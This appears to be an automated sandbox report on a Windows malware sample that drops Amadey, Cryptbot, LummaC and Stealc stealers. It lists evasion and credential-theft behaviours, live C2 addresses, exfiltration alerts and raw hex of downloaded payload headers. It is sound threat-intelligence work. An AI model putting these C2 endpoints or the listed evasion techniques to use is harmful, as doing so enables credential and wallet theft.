Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561837
MD5: ae5752fee54caf5584f6eaba06a5ac69
SHA1: 1666ac18e71ec8b5ea5a0ddd00dde2dde9175df9
SHA256: ec603a0936ee9833a10b2d9ad971eeab730399ea5b713bd6013550057873cbe8
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
DNS related to crypt mining pools
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files with a suspicious file extension
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000001.00000002.1758282576.0000000000691000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 779ae05f2f.exe.7908.7.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fvtekk5pn.top"]}
Source: 3907f97605.exe.7488.31.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 55%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 779ae05f2f.exe, 00000007.00000003.2487645168.0000000007452000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_563b8f9d-a
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=3907f97605.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=3907f97605.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=3907f97605.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=3907f97605.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon

Bitcoin Miner
barindex
DNS related to crypt mining pools
Source: unknown DNS query: name: xmr-eu2.nanopool.org
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c7f41aa061.exe, 0000002F.00000003.3276046785.0000000004E70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406301 FindFirstFileW,FindClose, 9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 9_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_00406301 FindFirstFileW,FindClose, 22_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 22_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49791 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49819 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49836 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49854 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49860 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49863 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49897 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49915 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49939 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49956 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49945
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49945
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50168 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49875 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49875 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49864 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49864 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49887 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49980 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49980 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49974 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49994 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49994 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49996 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50091 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50081 -> 104.21.33.116:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:24:11 GMTContent-Type: application/octet-streamContent-Length: 4380672Last-Modified: Sun, 24 Nov 2024 09:56:57 GMTConnection: keep-aliveETag: "6742f869-42d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 50 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 c4 00 00 04 00 00 04 13 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 33 c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 33 c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 63 76 6b 66 76 6a 00 30 1b 00 00 10 a9 00 00 26 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 75 62 64 6f 6a 6d 7a 00 10 00 00 00 40 c4 00 00 04 00 00 00 b2 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 c4 00 00 22 00 00 00 b6 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:24:24 GMTContent-Type: application/octet-streamContent-Length: 4299783Last-Modified: Sun, 24 Nov 2024 10:46:32 GMTConnection: keep-aliveETag: "67430408-419c07"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 d4 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 80 10 00 00 04 00 00 63 83 41 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 3e 63 00 00 00 00 00 00 00 00 00 00 df 75 41 00 28 26 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 3e 63 00 00 00 00 10 00 00 64 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 70 10 00 00 10 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
